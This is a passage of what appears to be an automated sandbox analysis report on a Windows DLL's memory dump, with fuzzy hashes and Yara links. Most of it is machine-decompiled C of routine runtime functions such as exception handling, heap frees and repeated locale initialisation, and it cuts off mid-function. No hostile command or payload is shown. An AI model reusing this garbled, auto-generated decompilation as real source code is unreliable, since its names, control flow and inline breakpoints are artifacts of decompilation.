WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 6DE22D29
WriteFile.KERNEL32(?,00000000,00000000,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D48
WriteFile.KERNEL32(?,?,00000001,6DE233A0,00000000,?,?,?,?,?,?,?,?,?,6DE233A0,?), ref: 6DE22D81

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction ID: 104513e5977ea89ddfb3f21c2a0ca18cf07bb6de8ea858be2271a30c6aaaa3a2
Opcode Fuzzy Hash: 3a10d5dc533f734151e5220854672d1dcc64ed0130d323453bddd69c40fbe67b
Instruction Fuzzy Hash: C95182B1E112499FDB20CFA8C885BEEBBF8EF19300F25455AE955E7281DB30D941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF3F60, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E6DDF3F60(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				long _v40;
				signed int _t48;
				char _t51;
				signed int _t58;
				intOrPtr _t59;
				void* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				void* _t66;
				long _t68;
				long _t70;
				intOrPtr _t74;
				signed int _t78;
				char _t80;
				intOrPtr _t83;
				intOrPtr _t88;
				intOrPtr _t90;
				intOrPtr _t93;
				long _t95;
				long _t97;
				void* _t98;
				void* _t100;
				void* _t102;
				void* _t104;
				void* _t105;
				void* _t112;

				_t86 = __edx;
				_push(__ebx);
				_t74 = _a8;
				_push(__edi);
				_v5 = 0;
				_t93 = _t74 + 0x10;
				_t48 =  *(_t74 + 8) ^  *0x6de9506c;
				_push(_t93);
				_push(_t48);
				_v16 = 1;
				_v20 = _t93;
				_v12 = _t48;
				E6DDF3F20(_t74, __edx);
				E6DDF5267(_a12);
				_t51 = _a4;
				_t105 = _t104 + 0xc;
				_t90 =  *((intOrPtr*)(_t74 + 0xc));
				if(( *(_t51 + 4) & 0x00000066) != 0) {
					__eflags = _t90 - 0xfffffffe;
					if(_t90 != 0xfffffffe) {
						_t86 = 0xfffffffe;
						E6DDF5920(_t74, 0xfffffffe, _t93, 0x6de9506c);
						goto L14;
					}
					goto L15;
				} else {
					_v32 = _t51;
					_v28 = _a12;
					 *((intOrPtr*)(_t74 - 4)) =  &_v32;
					if(_t90 == 0xfffffffe) {
						L15:
						return _v16;
					} else {
						do {
							_t78 = _v12;
							_t20 = _t90 + 2; // 0x3
							_t58 = _t90 + _t20 * 2;
							_t74 =  *((intOrPtr*)(_t78 + _t58 * 4));
							_t59 = _t78 + _t58 * 4;
							_t79 =  *((intOrPtr*)(_t59 + 4));
							_v24 = _t59;
							if( *((intOrPtr*)(_t59 + 4)) == 0) {
								_t80 = _v5;
								goto L8;
							} else {
								_t86 = _t93;
								_t60 = E6DDF58D0(_t79, _t93);
								_t80 = 1;
								_v5 = 1;
								_t112 = _t60;
								if(_t112 < 0) {
									_v16 = 0;
									L14:
									_push(_t93);
									_push(_v12);
									E6DDF3F20(_t74, _t86);
									goto L15;
								} else {
									if(_t112 > 0) {
										_t61 = _a4;
										__eflags =  *_t61 - 0xe06d7363;
										if( *_t61 == 0xe06d7363) {
											__eflags =  *0x6de3e698;
											if(__eflags != 0) {
												_t70 = E6DE37400(__eflags, 0x6de3e698);
												_t105 = _t105 + 4;
												__eflags = _t70;
												if(_t70 != 0) {
													_t97 =  *0x6de3e698; // 0x6ddf3b1a
													 *0x6de3a26c(_a4, 1);
													 *_t97();
													_t93 = _v20;
													_t105 = _t105 + 8;
												}
												_t61 = _a4;
											}
										}
										_t87 = _t61;
										E6DDF5904(_t61, _a8, _t61);
										_t63 = _a8;
										__eflags =  *((intOrPtr*)(_t63 + 0xc)) - _t90;
										if( *((intOrPtr*)(_t63 + 0xc)) != _t90) {
											_t87 = _t90;
											E6DDF5920(_t63, _t90, _t93, 0x6de9506c);
											_t63 = _a8;
										}
										_push(_t93);
										_push(_v16);
										 *((intOrPtr*)(_t63 + 0xc)) = _t74;
										E6DDF3F20(_t74, _t87);
										_t88 = _t93;
										_t83 =  *((intOrPtr*)(_v28 + 8));
										E6DDF58E8();
										asm("int3");
										_t100 = _t98;
										_t102 = _t100;
										_push(_t102);
										_push(_t93);
										_t95 = _v40;
										__eflags = _t95 - 0xffffffe0;
										if(_t95 > 0xffffffe0) {
											L32:
											 *((intOrPtr*)(E6DE12281())) = 0xc;
											_t66 = 0;
											__eflags = 0;
										} else {
											__eflags = _t95;
											if(_t95 == 0) {
												_t95 = _t95 + 1;
											}
											while(1) {
												_t66 = RtlAllocateHeap( *0x6de97b04, 0, _t95); // executed
												__eflags = _t66;
												if(_t66 != 0) {
													break;
												}
												__eflags = E6DE2BEB2();
												if(__eflags == 0) {
													goto L32;
												} else {
													_t68 = E6DE19256(_t74, _t83, _t88, _t90, __eflags, _t95);
													_pop(_t83);
													__eflags = _t68;
													if(_t68 == 0) {
														goto L32;
													} else {
														continue;
													}
												}
												goto L33;
											}
										}
										L33:
										return _t66;
									} else {
										goto L8;
									}
								}
							}
							goto L34;
							L8:
							_t90 = _t74;
						} while (_t74 != 0xfffffffe);
						if(_t80 != 0) {
							goto L14;
						}
						goto L15;
					}
				}
				L34:
			}

APIs

_ValidateLocalCookies.LIBCMT ref: 6DDF3F8B
___except_validate_context_record.LIBVCRUNTIME ref: 6DDF3F93
_ValidateLocalCookies.LIBCMT ref: 6DDF4021
__IsNonwritableInCurrentImage.LIBCMT ref: 6DDF404C
_ValidateLocalCookies.LIBCMT ref: 6DDF40A1

Strings

csm, xrefs: 6DDF4036

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction ID: b382dfe08ff69303ac4c97dacf90e362956c7bc857fa00feeffaec08ff1ced44
Opcode Fuzzy Hash: 9c86270efe3cc47c3a1d61a9ab946b776f8102da95491efc94747f91a47e6e70
Instruction Fuzzy Hash: 7E41B234A04209EBCF00EF68C840AAE7BB5EF45328F16C155F9149B356D732DA16CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2D29B, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DE2D29B(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6DE2CF81(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x1c
					E6DE2CF81(_t2, 7);
					_t3 = _t45 + 0x38; // 0x38
					E6DE2CF81(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x68
					E6DE2CF81(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x98
					E6DE2CF81(_t5, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa0)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa4)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0xa8)));
					_t9 = _t45 + 0xb4; // 0xb4
					E6DE2CF81(_t9, 7);
					_t10 = _t45 + 0xd0; // 0xd0
					E6DE2CF81(_t10, 7);
					_t11 = _t45 + 0xec; // 0xec
					E6DE2CF81(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x11c
					E6DE2CF81(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x14c
					E6DE2CF81(_t13, 2);
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x154)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x158)));
					E6DE1CBD3( *((intOrPtr*)(_t45 + 0x15c)));
					return E6DE1CBD3( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6DE2CF81: _free.LIBCMT ref: 6DE2CFAA

_free.LIBCMT ref: 6DE2D2E9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE2D2F4
_free.LIBCMT ref: 6DE2D2FF
_free.LIBCMT ref: 6DE2D353
_free.LIBCMT ref: 6DE2D35E
_free.LIBCMT ref: 6DE2D369
_free.LIBCMT ref: 6DE2D374

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction ID: 951ca8434bad5311aa123dca6ae97f31c248099c24918fce376f70bb1222d510
Opcode Fuzzy Hash: 60696fea0fb7a8f1018e7d39f05bb92555332742b445cba9cf2dcfb68d68d62d
Instruction Fuzzy Hash: A8118171B49B08AAE620A7B0CC85FDBB7ED9F0070CF518E2DA399E6051DF35F5144650

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDEF91, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDEF91(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t307;
				signed int _t308;
				void* _t320;
				void* _t333;
				void* _t346;
				void* _t359;
				void* _t372;
				void* _t385;
				void* _t398;
				void* _t411;
				void* _t424;
				void* _t437;
				void* _t450;
				void* _t463;
				void* _t476;
				void* _t489;
				void* _t502;
				void* _t515;
				void* _t528;
				void* _t541;
				void* _t554;
				void* _t567;
				signed int _t815;
				signed int _t882;
				signed int _t883;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t913;
				signed int _t914;
				signed int _t915;
				signed int _t916;
				signed int _t917;
				signed int _t918;
				signed int _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				void* _t946;

				_t879 = __edx;
				_t668 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t946 - 0x14, 0);
				_t903 =  *0x6de96de4; // 0x0
				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
				 *(_t946 - 0x10) = _t903;
				_t307 = E6DDB161C(0x6de96d90);
				_t671 =  *((intOrPtr*)(_t946 + 8));
				_t308 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t307);
				_t881 = _t308;
				if(_t308 != 0) {
					L5:
					E6DDD66BA(_t946 - 0x14);
					return E6DDF0075(_t881);
				} else {
					if(_t903 == 0) {
						_push( *((intOrPtr*)(_t946 + 8)));
						_push(_t946 - 0x10);
						__eflags = E6DDE0D03(__ebx, _t671, __edx, _t881, _t903) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t946 - 0x20);
							E6DDF3D74(_t946 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t881, _t903, 0x14);
							E6DDD6653(_t946 - 0x14, 0);
							_t904 =  *0x6de96db4; // 0x0
							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
							 *(_t946 - 0x10) = _t904;
							_t320 = E6DDB161C(0x6de96d68);
							_t678 =  *((intOrPtr*)(_t946 + 8));
							_t882 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t320);
							__eflags = _t882;
							if(_t882 != 0) {
								L12:
								E6DDD66BA(_t946 - 0x14);
								return E6DDF0075(_t882);
							} else {
								__eflags = _t904;
								if(_t904 == 0) {
									_push( *((intOrPtr*)(_t946 + 8)));
									_push(_t946 - 0x10);
									__eflags = E6DDE0DA5(_t668, _t678, __edx, _t882, _t904) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t946 - 0x20);
										E6DDF3D74(_t946 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t668, _t882, _t904, 0x14);
										E6DDD6653(_t946 - 0x14, 0);
										_t905 =  *0x6de96dd4; // 0x0
										 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
										 *(_t946 - 0x10) = _t905;
										_t333 = E6DDB161C(0x6de96b28);
										_t685 =  *((intOrPtr*)(_t946 + 8));
										_t883 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t333);
										__eflags = _t883;
										if(_t883 != 0) {
											L19:
											E6DDD66BA(_t946 - 0x14);
											return E6DDF0075(_t883);
										} else {
											__eflags = _t905;
											if(_t905 == 0) {
												_push( *((intOrPtr*)(_t946 + 8)));
												_push(_t946 - 0x10);
												__eflags = E6DDE0E47(_t668, _t685, __edx, _t883, _t905) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t946 - 0x20);
													E6DDF3D74(_t946 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t668, _t883, _t905, 0x14);
													E6DDD6653(_t946 - 0x14, 0);
													_t906 =  *0x6de96de8; // 0x0
													 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
													 *(_t946 - 0x10) = _t906;
													_t346 = E6DDB161C(0x6de96d94);
													_t692 =  *((intOrPtr*)(_t946 + 8));
													_t884 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t346);
													__eflags = _t884;
													if(_t884 != 0) {
														L26:
														E6DDD66BA(_t946 - 0x14);
														return E6DDF0075(_t884);
													} else {
														__eflags = _t906;
														if(_t906 == 0) {
															_push( *((intOrPtr*)(_t946 + 8)));
															_push(_t946 - 0x10);
															__eflags = E6DDE0EB7(_t668, _t692, _t879, _t884, _t906) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t946 - 0x20);
																E6DDF3D74(_t946 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t668, _t884, _t906, 0x14);
																E6DDD6653(_t946 - 0x14, 0);
																_t907 =  *0x6de96db8; // 0x0
																 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																 *(_t946 - 0x10) = _t907;
																_t359 = E6DDB161C(0x6de96d6c);
																_t699 =  *((intOrPtr*)(_t946 + 8));
																_t885 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t359);
																__eflags = _t885;
																if(_t885 != 0) {
																	L33:
																	E6DDD66BA(_t946 - 0x14);
																	return E6DDF0075(_t885);
																} else {
																	__eflags = _t907;
																	if(_t907 == 0) {
																		_push( *((intOrPtr*)(_t946 + 8)));
																		_push(_t946 - 0x10);
																		__eflags = E6DDE0F1F(_t668, _t699, _t879, _t885, _t907) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t946 - 0x20);
																			E6DDF3D74(_t946 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t668, _t885, _t907, 0x14);
																			E6DDD6653(_t946 - 0x14, 0);
																			_t908 =  *0x6de96dec; // 0x0
																			 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																			 *(_t946 - 0x10) = _t908;
																			_t372 = E6DDB161C(0x6de96d98);
																			_t706 =  *((intOrPtr*)(_t946 + 8));
																			_t886 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t372);
																			__eflags = _t886;
																			if(_t886 != 0) {
																				L40:
																				E6DDD66BA(_t946 - 0x14);
																				return E6DDF0075(_t886);
																			} else {
																				__eflags = _t908;
																				if(_t908 == 0) {
																					_push( *((intOrPtr*)(_t946 + 8)));
																					_push(_t946 - 0x10);
																					__eflags = E6DDE0F87(_t668, _t706, _t879, _t886, _t908) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t946 - 0x20);
																						E6DDF3D74(_t946 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t668, _t886, _t908, 0x14);
																						E6DDD6653(_t946 - 0x14, 0);
																						_t909 =  *0x6de96dbc; // 0x0
																						 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																						 *(_t946 - 0x10) = _t909;
																						_t385 = E6DDB161C(0x6de96d70);
																						_t713 =  *((intOrPtr*)(_t946 + 8));
																						_t887 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t385);
																						__eflags = _t887;
																						if(_t887 != 0) {
																							L47:
																							E6DDD66BA(_t946 - 0x14);
																							return E6DDF0075(_t887);
																						} else {
																							__eflags = _t909;
																							if(_t909 == 0) {
																								_push( *((intOrPtr*)(_t946 + 8)));
																								_push(_t946 - 0x10);
																								__eflags = E6DDE0FEF(_t668, _t713, _t879, _t887, _t909) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t946 - 0x20);
																									E6DDF3D74(_t946 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t668, _t887, _t909, 0x14);
																									E6DDD6653(_t946 - 0x14, 0);
																									_t910 =  *0x6de96df0; // 0x0
																									 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																									 *(_t946 - 0x10) = _t910;
																									_t398 = E6DDB161C(0x6de96d9c);
																									_t720 =  *((intOrPtr*)(_t946 + 8));
																									_t888 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t398);
																									__eflags = _t888;
																									if(_t888 != 0) {
																										L54:
																										E6DDD66BA(_t946 - 0x14);
																										return E6DDF0075(_t888);
																									} else {
																										__eflags = _t910;
																										if(_t910 == 0) {
																											_push( *((intOrPtr*)(_t946 + 8)));
																											_push(_t946 - 0x10);
																											__eflags = E6DDE1057(_t668, _t720, _t879, _t888, _t910) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t946 - 0x20);
																												E6DDF3D74(_t946 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t668, _t888, _t910, 0x14);
																												E6DDD6653(_t946 - 0x14, 0);
																												_t911 =  *0x6de96dc0; // 0x0
																												 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																												 *(_t946 - 0x10) = _t911;
																												_t411 = E6DDB161C(0x6de96d74);
																												_t727 =  *((intOrPtr*)(_t946 + 8));
																												_t889 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t411);
																												__eflags = _t889;
																												if(_t889 != 0) {
																													L61:
																													E6DDD66BA(_t946 - 0x14);
																													return E6DDF0075(_t889);
																												} else {
																													__eflags = _t911;
																													if(_t911 == 0) {
																														_push( *((intOrPtr*)(_t946 + 8)));
																														_push(_t946 - 0x10);
																														__eflags = E6DDE10BF(_t668, _t727, _t879, _t889, _t911) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t946 - 0x20);
																															E6DDF3D74(_t946 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t668, _t889, _t911, 0x14);
																															E6DDD6653(_t946 - 0x14, 0);
																															_t912 =  *0x6de96df8; // 0x0
																															 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																															 *(_t946 - 0x10) = _t912;
																															_t424 = E6DDB161C(0x6de96da4);
																															_t734 =  *((intOrPtr*)(_t946 + 8));
																															_t890 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t424);
																															__eflags = _t890;
																															if(_t890 != 0) {
																																L68:
																																E6DDD66BA(_t946 - 0x14);
																																return E6DDF0075(_t890);
																															} else {
																																__eflags = _t912;
																																if(_t912 == 0) {
																																	_push( *((intOrPtr*)(_t946 + 8)));
																																	_push(_t946 - 0x10);
																																	__eflags = E6DDE1127(_t668, _t734, _t879, _t890, _t912) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t946 - 0x20);
																																		E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t668, _t890, _t912, 0x14);
																																		E6DDD6653(_t946 - 0x14, 0);
																																		_t913 =  *0x6de96df4; // 0x0
																																		 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																		 *(_t946 - 0x10) = _t913;
																																		_t437 = E6DDB161C(0x6de96da0);
																																		_t741 =  *((intOrPtr*)(_t946 + 8));
																																		_t891 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t437);
																																		__eflags = _t891;
																																		if(_t891 != 0) {
																																			L75:
																																			E6DDD66BA(_t946 - 0x14);
																																			return E6DDF0075(_t891);
																																		} else {
																																			__eflags = _t913;
																																			if(_t913 == 0) {
																																				_push( *((intOrPtr*)(_t946 + 8)));
																																				_push(_t946 - 0x10);
																																				__eflags = E6DDE11AB(_t668, _t741, _t879, _t891, _t913) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t946 - 0x20);
																																					E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t668, _t891, _t913, 0x14);
																																					E6DDD6653(_t946 - 0x14, 0);
																																					_t914 =  *0x6de96dc8; // 0x0
																																					 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																					 *(_t946 - 0x10) = _t914;
																																					_t450 = E6DDB161C(0x6de96d7c);
																																					_t748 =  *((intOrPtr*)(_t946 + 8));
																																					_t892 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t450);
																																					__eflags = _t892;
																																					if(_t892 != 0) {
																																						L82:
																																						E6DDD66BA(_t946 - 0x14);
																																						return E6DDF0075(_t892);
																																					} else {
																																						__eflags = _t914;
																																						if(_t914 == 0) {
																																							_push( *((intOrPtr*)(_t946 + 8)));
																																							_push(_t946 - 0x10);
																																							__eflags = E6DDE1230(_t668, _t748, _t879, _t892, _t914) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t946 - 0x20);
																																								E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t668, _t892, _t914, 0x14);
																																								E6DDD6653(_t946 - 0x14, 0);
																																								_t915 =  *0x6de96dc4; // 0x0
																																								 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																								 *(_t946 - 0x10) = _t915;
																																								_t463 = E6DDB161C(0x6de96d78);
																																								_t755 =  *((intOrPtr*)(_t946 + 8));
																																								_t893 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t463);
																																								__eflags = _t893;
																																								if(_t893 != 0) {
																																									L89:
																																									E6DDD66BA(_t946 - 0x14);
																																									return E6DDF0075(_t893);
																																								} else {
																																									__eflags = _t915;
																																									if(_t915 == 0) {
																																										_push( *((intOrPtr*)(_t946 + 8)));
																																										_push(_t946 - 0x10);
																																										__eflags = E6DDE12B4(_t668, _t755, _t879, _t893, _t915) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t946 - 0x20);
																																											E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t668, _t893, _t915, 0x14);
																																											E6DDD6653(_t946 - 0x14, 0);
																																											_t916 =  *0x6de96dd8; // 0x0
																																											 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																											 *(_t946 - 0x10) = _t916;
																																											_t476 = E6DDB161C(0x6de96d84);
																																											_t762 =  *((intOrPtr*)(_t946 + 8));
																																											_t894 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t476);
																																											__eflags = _t894;
																																											if(_t894 != 0) {
																																												L96:
																																												E6DDD66BA(_t946 - 0x14);
																																												return E6DDF0075(_t894);
																																											} else {
																																												__eflags = _t916;
																																												if(_t916 == 0) {
																																													_push( *((intOrPtr*)(_t946 + 8)));
																																													_push(_t946 - 0x10);
																																													__eflags = E6DDE1339(_t668, _t762, _t879, _t894, _t916) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t946 - 0x20);
																																														E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t668, _t894, _t916, 0x14);
																																														E6DDD6653(_t946 - 0x14, 0);
																																														_t917 =  *0x6de96db0; // 0x0
																																														 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																														 *(_t946 - 0x10) = _t917;
																																														_t489 = E6DDB161C(0x6de96d64);
																																														_t769 =  *((intOrPtr*)(_t946 + 8));
																																														_t895 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t489);
																																														__eflags = _t895;
																																														if(_t895 != 0) {
																																															L103:
																																															E6DDD66BA(_t946 - 0x14);
																																															return E6DDF0075(_t895);
																																														} else {
																																															__eflags = _t917;
																																															if(_t917 == 0) {
																																																_push( *((intOrPtr*)(_t946 + 8)));
																																																_push(_t946 - 0x10);
																																																__eflags = E6DDE13A1(_t668, _t769, _t879, _t895, _t917) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t946 - 0x20);
																																																	E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t668, _t895, _t917, 0x14);
																																																	E6DDD6653(_t946 - 0x14, 0);
																																																	_t918 =  *0x6de96ddc; // 0x0
																																																	 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																	 *(_t946 - 0x10) = _t918;
																																																	_t502 = E6DDB161C(0x6de96d88);
																																																	_t776 =  *((intOrPtr*)(_t946 + 8));
																																																	_t896 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t502);
																																																	__eflags = _t896;
																																																	if(_t896 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t946 - 0x14);
																																																		return E6DDF0075(_t896);
																																																	} else {
																																																		__eflags = _t918;
																																																		if(_t918 == 0) {
																																																			_push( *((intOrPtr*)(_t946 + 8)));
																																																			_push(_t946 - 0x10);
																																																			__eflags = E6DDE1409(_t668, _t776, _t879, _t896, _t918) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t946 - 0x20);
																																																				E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t668, _t896, _t918, 0x14);
																																																				E6DDD6653(_t946 - 0x14, 0);
																																																				_t919 =  *0x6de96de0; // 0x0
																																																				 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																				 *(_t946 - 0x10) = _t919;
																																																				_t515 = E6DDB161C(0x6de96d8c);
																																																				_t783 =  *((intOrPtr*)(_t946 + 8));
																																																				_t897 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t515);
																																																				__eflags = _t897;
																																																				if(_t897 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t946 - 0x14);
																																																					return E6DDF0075(_t897);
																																																				} else {
																																																					__eflags = _t919;
																																																					if(_t919 == 0) {
																																																						_push( *((intOrPtr*)(_t946 + 8)));
																																																						_push(_t946 - 0x10);
																																																						__eflags = E6DDE1471(_t668, _t783, _t879, _t897, _t919) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t946 - 0x20);
																																																							E6DDF3D74(_t946 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t668, _t897, _t919, 0x14);
																																																							E6DDD6653(_t946 - 0x14, 0);
																																																							_t920 =  *0x6de96dfc; // 0x0
																																																							 *(_t946 - 4) =  *(_t946 - 4) & 0x00000000;
																																																							 *(_t946 - 0x10) = _t920;
																																																							_t528 = E6DDB161C(0x6de96da8);
																																																							_t790 =  *((intOrPtr*)(_t946 + 8));
																																																							_t898 = E6DDB171B( *((intOrPtr*)(_t946 + 8)), _t528);
																																																							__eflags = _t898;
																																																							if(_t898 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t946 - 0x14);
																																																								return E6DDF0075(_t898);
																																																							} else {
																																																								__eflags = _t920;
																																																								if(_t920 == 0) {
